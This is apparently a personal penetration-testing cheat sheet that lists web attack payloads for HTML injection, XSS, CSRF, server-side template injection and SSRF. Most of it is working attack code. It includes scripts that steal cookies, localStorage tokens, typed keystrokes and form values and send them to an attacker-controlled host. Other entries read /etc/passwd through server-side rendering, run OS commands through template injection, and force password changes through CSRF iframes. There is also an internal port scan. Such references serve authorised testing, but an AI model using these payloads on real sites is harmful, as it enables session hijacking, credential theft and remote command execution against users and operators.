XSS / HTMLi / (S/C)SRF / SSTI
01. HTML Injection
Basic Test Payloads
<h1>h4rithd was here</h1>
<b>h4rithd was here<b>
<img src="https://media.giphy.com/media/3XpvBjjMWtYYIOtOlp/giphy.gif"/>
<img src="https://media.tenor.com/He2W0AQvZfsAAAAC/hacked-hack.gif"/>
<marquee direction="up">h4rithd was here.</marquee>
<marquee direction="left" behavior="alternate">h4rithd was here</marquee>
<marquee behavior="scroll" direction="up"><img src="https://c.tenor.com/uXWSDlYIKl0AAAAM/danceroblox.gif"/></marquee>
02. Cross Site Scripting (XSS)
Steal Cookie
## ------------------| Setup on my machine
#### Basic [h4rithd.js
fetch("http://<IP>/favicon.ico?c="+document.cookie);
#### Encoded
fetch("http://<IP>/favicon.ico?c=" + btoa(document.cookie))
fetch("http://<IP>/favicon.ico?c=" + encodeURIComponent(document.cookie))
## ------------------| Payload
<script src="http://<IP>/h4rithd.js"></script>
Payloads
## python3 -m http.server 80
## ------------------| My fav paylods
<script>fetch("http://<MYIP>/favicon.ico?c="+document.cookie);</script>
<img src=x onerror=fetch("http://<MYIP>/favicon.ico?c="+document.cookie);>
<script>new Image().src="http://<MYIP>/favicon.ico?c="+document.cookie;</script>
<img src=x onerror=this.src="http://<MYIP>/favicon.ico?c="+btoa(document.cookie)/>
<script>document.location="http://<MYIP>/favicon.ico?c="+document.cookie;</script>
<script>var i=new Image(); i.src="http://<MYIP>/favicon.ico?c="+btoa(document.cookie);</script>
<script>document.write('<img src="http://<MYIP>/favicon.ico?c='+document.cookie+'"/>')</script>
## ------------------| Common paylods
-->'"/></sCript><deTailS open x=">" ontoggle=(co\u006efim)``>
<script>alert(123)</script>
<script>location.replace("https://h4rithd.com")</script>
<img src="x` `<script>javascript:alert(1)</script>"` `>
<img src="x` `<script>document.write('<script src="http://<MYIP>/favicon.ico?c="></script>');</script>"` `>`
<script>alert(localStorage.authorizations)</script>
<script>alert(JSON.stringify(localStorage))</script>
<img src='https://127.0.0.1/fav.ico?t0k3n='+JSON.stringify(localStorage);'--!>
"/><script>alert(123)</script>
"/><IMG SRC=x onmouseover="alert('xss')">
<IMG SRC=x onmouseover="alert('xss')">
<img src=http://10.10.14.22/hit/>
<xss id=x tabindex=1 onactivate=alert(1)></xss>
<script>location.replace("https://h4rithd.com")</script>
## ------------------| Other Paylods
<IMG onmouseover="alert('xss')">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC="jav ascript:alert('XSS');">
<IMG SRC= onmouseover="alert('xss')">
<IMG SRC=# onmouseover="alert('xss')">
<IMG SRC=x onmouseover="alert('xss')">
<IMG """><SCRIPT>alert("XSS")</SCRIPT>"\>
<IMG SRC=javascript:alert("XSS")>
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
<svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>
\<a onmouseover="alert(document.cookie)"\>xss link\</a\>
\<a onmouseover=alert(document.cookie)\>xss link\</a\>
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>
<img src=x onerror="javascript:alert('XSS')">
<IMG SRC=javascript:alert('XSS')>
## ------------------| WAF Bypass
<svg on onload=(alert)(123)>
<svg onx=() onload=(confirm)(1)>
<x"/onclick=(confirm)()>h4rithd!
<svg onload=prompt%26%230000000040document.domain)>
<svg onload=prompt%26%23x000000028;document.domain)>
javascript:{ alert`0` }
1'"><img/src/onerror=.1|alert``>
<img ignored=() src=x onerror=prompt(1)>
Send with cors
const data = {
username: "h4rithd",
isAdmin: 1
}
fetch('/api/v1/updateUser', {
method: 'POST',
credentials: "include",
headers: {
'Content-Type': 'application/json',
},
body: JSON.stringify(data)
})
//<script src="http://<IP>/h4rithd.js"></script>
## ------------------| Payload I
var _get = new XMLHttpRequest();
_get.open("GET", 'http://victim-site/', false);
_get.send();
var _res = btoa(_get.responseText);
var _send = new XMLHttpRequest();
_send.open("GET", "http://<MyIP>/" + _res , false);
_send.send();
## ------------------| Payload II
var xhr = new XMLHttpRequest();
var url = "http://localhost/admin/backdoorchecker.php";
var params = "cmd=dir | ping -n 2 10.10.14.22";
xhr.open("POST", url);
xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
xhr.withCredentials = true;
xhr.send(params);
# catch this via payload
<script src=http://10.10.14.22/script.js></script>
Server Side XSS (Dynamic PDF)
## ------------------| Read local file
<script>
x=new XMLHttpRequest;
x.onload=function(){document.write(this.responseText)};
x.open("GET","file:///etc/passwd");x.send();
</script>
## If you need base64 encoded text, then use thisone.
x.onload=function(){document.write(btoa(this.responseText))};
Other APIs
## ------------------| Start the sever for fetch the data
sudo python3 -m http.server 80
## ------------------| Extract stored passwords
<script>
for(let values of document.getElementsByTagName("input")){fetch("http://IP/favicon.ico?data=" + values.value);}
</script>
## ------------------| Keylogers
<script>
function klog(event){fetch("http://IP/favicon.ico?data=" + event.key);}
document.addEventListener('keydown',klog);
</script>
03. Cross-Site Request Forgery (CSRF)
Create Payload
<html>
<iframe src="http://MyIP/IFrameIsWorkingFine"></iframe>
<iframe src="http://10.10.10.97/ChangePass?password=Welcome123"></iframe>
</html>
04. Server-Side Template Injection (SSTI)
${{<%[%'"}}%\.
///test/e%0A;<%25%3d+system("ping+-c+2+10.10.14.4")+%25>
sdf%0a<%25=File.read("/etc/passwd")%25>
<%= id %>
{{7*7}}
${7*7}
<%= 7*7 %>
${{7*7}}
#{7*7}
*{7*7}
#{1+3+3+7}
{{.}}
{{user}}
{{config}}
{{password}}
{%include user%}
{%include config%}
{% include config %}
{%include password%}
{{ get_flashed_messages.globals.builtins.open("/etc/passwd").read() }}
{{ namespace.__init__.__globals__.os.popen('id').read() }}
{{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('id')|attr('read')()}}
## ------------------| SpringFrameworkβs
{"harithd".replace("a","4")}
{"".getClass().forName("java.lang.Runtime").getRuntime().exec("ping -c 2 <IP>")}
{{ cycler.__init__.__globals__.os.popen('id').read() }}
{{ joiner.__init__.__globals__.os.popen('id').read() }}
{{ namespace.__init__.__globals__.os.popen('id').read() }}
{{ self.__init__.__globals__.__builtins__.__import__('os').popen('id').read() }}
{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('id').read() }}
{{ self._TemplateReference__context.joiner.__init__.__globals__.os.popen('id').read() }}
{{ self._TemplateReference__context.namespace.__init__.__globals__.os.popen('id').read() }}
Click here for list of payloads.
05. Server-Side Request Forgery (SSRF)
### Setup local web server
sudo python3 -m http.server 80
### Browse URL
### scan localports
/url.php?path=http://localhost:80
wfuzz -u 'http://10.10.10.55:60000/url.php?path=localhost:FUZZ' -z range,1-65535 --hl 2
Gopher [Link]
## ------------------| Test Vuln
### Setup Listener
sudo nc -lvnp 80
### Check if if vuln
### [\n ==> %0a, %25%30%61 (dubbel Encoded) , space ==> %20, %25%32%30 (dubbel Encoded)]
/url.php?path=gopher://<IP>:80/_GET / HTTP/1.0
/url.php?path=gopher://<IP>:80/_GET%%32%30%2fh4rithd.com%25%32%30HTTP/1.1
### Try to send internal requests
Last updated